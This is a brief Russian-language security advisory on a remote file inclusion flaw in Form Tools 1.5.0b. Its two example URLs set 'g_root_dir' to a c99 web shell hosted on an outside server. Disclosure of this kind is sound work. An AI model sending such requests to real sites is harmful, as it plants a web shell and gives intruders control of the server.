Программа: Form Tools 1.5.0b

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «g_root_dir» сценариями admin_page_open.php и client_page_open.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

www.RxH.com/FormTools1_5_0/global/templates/admin_page_open.php? g_root_dir=http://no-hack.fr/shells/c99.txt?
www.RxH.com/FormTools1_5_0/global/templates/client_page_open.php? g_root_dir=http://no-hack.fr/shells/c99.txt?



Оставить мнение